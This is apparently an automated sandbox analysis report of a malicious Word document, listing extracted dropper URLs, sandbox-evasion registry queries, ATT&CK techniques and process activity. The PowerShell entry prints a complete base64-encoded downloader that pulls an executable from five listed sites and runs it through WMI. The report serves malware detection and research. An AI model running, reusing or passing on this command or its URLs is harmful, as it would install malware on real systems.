0b5f556c8d92261fdf0686c7641266d79c306b855ebe9894572d32667f59c9c2

General

Target

0b5f556c8d92261fdf0686c7641266d79c306b855ebe9894572d32667f59c9c2.doc
Sample

200129-dk6c6gjavn
SHA256

0b5f556c8d92261fdf0686c7641266d79c306b855ebe9894572d32667f59c9c2

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://blinkro.eu/wp-content/hMDRkCt/

exe.dropper

http://blasmontavez.com/wp-includes/ep0/

exe.dropper

http://luxuryflower.net/wp-content/cgNoUgY/

exe.dropper

http://gostareh.org/old/f7tSe81/

exe.dropper

http://hindwalkerphoto.com/wp-content/v1d8mo/

Signatures

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

PoWERsheLL.exe

description pid process

Token: SeDebugPrivilege 4168 PoWERsheLL.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

PoWERsheLL.exe

pid process

4168 PoWERsheLL.exe

description	pid	process
Token: SeDebugPrivilege	4168	PoWERsheLL.exe

pid	process
4168	PoWERsheLL.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

4876 WINWORD.EXE
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

WINWORD.EXE

pid process

4876 WINWORD.EXE

pid	process
4876	WINWORD.EXE

pid	process
4876	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

Processes:

PoWERsheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4168	2080	PoWERsheLL.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0b5f556c8d92261fdf0686c7641266d79c306b855ebe9894572d32667f59c9c2.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4876

C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
PoWERsheLL -e JABRAGsAdwBtAHAAaQBsAHUAawA9ACcAWgBkAGoAZQBlAG8AeABtAHkAJwA7ACQATwBtAHYAcABxAGQAdgB0AHMAbwBqACAAPQAgACcAMwAxADYAJwA7ACQAVABqAG0AaQBhAGkAcwBxAGIAYQBsAD0AJwBSAGQAdAB3AGYAdABlAHoAbgBwAG4AdQAnADsAJABGAGwAagByAHQAZABuAHAAaQBlAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAG0AdgBwAHEAZAB2AHQAcwBvAGoAKwAnAC4AZQB4AGUAJwA7ACQARQByAHcAawB5AGwAeABjAGMAYwB6AD0AJwBSAHcAZwB6AHIAZwBtAG4AbABkACcAOwAkAEwAdwB1AGEAeABiAGwAbAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAEUAQgBDAEwAaQBlAE4AdAA7ACQAUwB0AGgAdwB2AHMAdABqAHYAYwA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAaQBuAGsAcgBvAC4AZQB1AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGgATQBEAFIAawBDAHQALwAqAGgAdAB0AHAAOgAvAC8AYgBsAGEAcwBtAG8AbgB0AGEAdgBlAHoALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGUAcAAwAC8AKgBoAHQAdABwADoALwAvAGwAdQB4AHUAcgB5AGYAbABvAHcAZQByAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AYwBnAE4AbwBVAGcAWQAvACoAaAB0AHQAcAA6AC8ALwBnAG8AcwB0AGEAcgBlAGgALgBvAHIAZwAvAG8AbABkAC8AZgA3AHQAUwBlADgAMQAvACoAaAB0AHQAcAA6AC8ALwBoAGkAbgBkAHcAYQBsAGsAZQByAHAAaABvAHQAbwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHYAMQBkADgAbQBvAC8AJwAuACIAcwBwAGwAYABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABPAGIAbwBnAHUAegBvAGsAdABvAHoAZQA9ACcAUgB1AG8AYQByAHcAdQBoAG0AYwBoACcAOwBmAG8AcgBlAGEAYwBoACgAJABFAGYAcQBwAHYAdQBhAHAAegBkAGwAdgAgAGkAbgAgACQAUwB0AGgAdwB2AHMAdABqAHYAYwApAHsAdAByAHkAewAkAEwAdwB1AGEAeABiAGwAbAAuACIAZABvAHcAbgBMAE8AQQBgAEQARgBpAGAATABFACIAKAAkAEUAZgBxAHAAdgB1AGEAcAB6AGQAbAB2ACwAIAAkAEYAbABqAHIAdABkAG4AcABpAGUAKQA7ACQATgBkAGIAdABuAGcAcQBqAGoAagB3AGgAPQAnAEEAcwBkAHgAYgBpAGUAcAByAHkAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABGAGwAagByAHQAZABuAHAAaQBlACkALgAiAGwARQBOAGAARwBUAEgAIgAgAC0AZwBlACAAMgA3ADcANQA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAHIAZQBBAGAAVABlACIAKAAkAEYAbABqAHIAdABkAG4AcABpAGUAKQA7ACQAWgBoAG8AbAB6AGYAZQBiAGcAcwB2AG0APQAnAEUAaABsAHMAdABvAG0AdQBwAGoAZgBmAGcAJwA7AGIAcgBlAGEAawA7ACQATQBjAGoAYQBtAHIAYwB2AHgAdwBjAHkAagA9ACcASQBrAGQAagB6AGkAZwBnAHEAeQBoAGUAcgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABUAHkAbQBkAHUAcQBtAGwAbAA9ACcATQBuAHYAcQBwAGMAYQBxACcA
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
PID:4168

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads